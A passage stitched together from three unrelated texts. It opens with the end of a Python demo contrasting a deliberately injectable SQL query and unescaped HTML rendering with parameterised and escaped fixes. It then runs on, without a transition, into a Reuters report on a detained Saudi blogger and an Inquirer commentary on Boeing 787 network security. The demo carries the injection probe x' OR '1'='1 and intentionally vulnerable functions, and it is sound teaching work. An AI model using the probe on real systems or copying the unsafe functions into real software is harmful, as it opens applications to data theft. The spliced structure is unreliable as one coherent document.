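    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Press release", "CA announces a product."), ("Internal memo", INJECTED_BODY)],
    )
    return conn


def find_by_title_unsafe(conn, title):
    """Broken: the request value is spliced into the SQL text, so a quote in it
    changes the statement instead of being compared as data."""
    sql = "SELECT id, title FROM articles WHERE title = '" + title + "'"
    return conn.execute(sql).fetchall()


def find_by_title_safe(conn, title):
    """Fixed: the value is bound as a parameter; the statement's shape cannot change."""
    return conn.execute(
        "SELECT id, title FROM articles WHERE title = ?", (title,)
    ).fetchall()


def render_unsafe(body):
    """Broken: stored text is written straight into the page."""
    return "<p>" + body + "</p>"


def render_safe(body):
    """Fixed: <, >, &, and quotes become entities, so stored script is shown, not run."""
    return "<p>" + html.escape(body, quote=True) + "</p>"


def demo():
    """Exercise both pairs of functions; returns a dict of observations."""
    conn = make_db()
    probe = "x' OR '1'='1"  # textbook value that widens a spliced WHERE clause
    try:  # even an ordinary apostrophe breaks the spliced statement
        find_by_title_unsafe(conn, "O'Reilly")
        apostrophe_errors = False
    except sqlite3.OperationalError:
        apostrophe_errors = True
    body = conn.execute(
        "SELECT body FROM articles WHERE title = ?", ("Internal memo",)
    ).fetchone()[0]
    return {
        "unsafe_rows": len(find_by_title_unsafe(conn, probe)),  # every row comes back
        "safe_rows": len(find_by_title_safe(conn, probe)),  # no title equals the probe
        "unsafe_apostrophe_errors": apostrophe_errors,
        "unsafe_html_has_script": "<script" in render_unsafe(body),
        "safe_html_has_script": "<script" in render_safe(body),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:26s} {value}")
```

The two fixes are independent and both are needed: bound parameters stop new script from being written through the application's own queries, and output escaping means that rows already written by a mass injection (or by any other path into the database) reach the browser as visible text rather than as executable markup.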


Saudi detains blogger, rights group urges release

RIYADH (Reuters) - The U.S.-based Committee to Protect Journalists has urged Saudi Arabia to release a blogger who has been detained in the conservative Muslim kingdom for almost a month for his writings.

Interior Ministry Spokesman Mansour al-Turki confirmed that Fouad al-Farhan was being detained but declined to say under what charges. The blogger was not being held over any security-related issues, he added.

The Committee to Protect Journalists said Farhan was arrested for writing articles about political prisoners in Saudi Arabia on his Web site (www.alfarhan.org).

"Arbitrarily detaining a writer and holding him for weeks without saying why violates the most basic norms for free expression and serves as a chilling reminder to those seeking to express their opinions," CPJ said in the letter.

"It also runs counter to official Saudi statements in support of reform and a more open press."

Farhan said Saudi authorities think he was running "an online campaign promoting the political prisoners issue", according to an email sent to friends, a copy of which was obtained by Reuters.

Saudi Arabia is often the target of complaints by rights groups. It recently faced international criticism over an Islamic court ruling that sentenced a gang-rape victim to flogging. The Saudi king later pardoned the 19-year-old woman.


New Boeing 787 vulnerable to hacking

According to the U.S. Federal Aviation Administration, the new Boeing 787 Dreamliner aeroplane may have a serious security vulnerability in its on-board computer networks that could allow passengers to access the plane's control systems.

The computer network for the Dreamliner's passengers, designed to give passengers in-flight internet access and entertainment, is connected to the plane's control, navigation and communication systems, the FAA report reveals (the report is mirrored here).

It also connects to the airline's business and administrative-support network, which communicates maintenance issues to ground crews.

The design "allows new kinds of passenger connectivity to previously isolated data networks connected to systems that perform functions required for the safe operation of the airplane," says the FAA report. "Because of this new passenger connectivity, the proposed data-network design and integration may result in security vulnerabilities from intentional or unintentional corruption of data and systems critical to the safety and maintenance of the airplane."

Boeing said it's aware of the issue and has designed a solution it will test shortly.

More worryingly, there seems to be some confusion at Boeing as to what exactly the situation is: Boeing spokeswoman Lori Gunter said the wording of the FAA document is misleading, and that the plane's networks don't completely connect. Why are you testing a new solution, then?

Gunter said Boeing is employing a combination of solutions that involves some physical separation of the networks, known as "air gaps," and software firewalls. Gunter also mentioned other technical solutions, which she said are proprietary and didn't want to discuss in public.

Short of the need to pause programming for announcements by the crew, which could surely be routed by some safe means, we just cannot contemplate why on earth the navigation and control systems need to be connected to the on-board passenger entertainment network, and why this was ever thought plausible and safe in the first place.

In our opinion a system like this is never 100% safe unless the two networks are completely physically separated.

The INQ will stick to flying airships from now on.
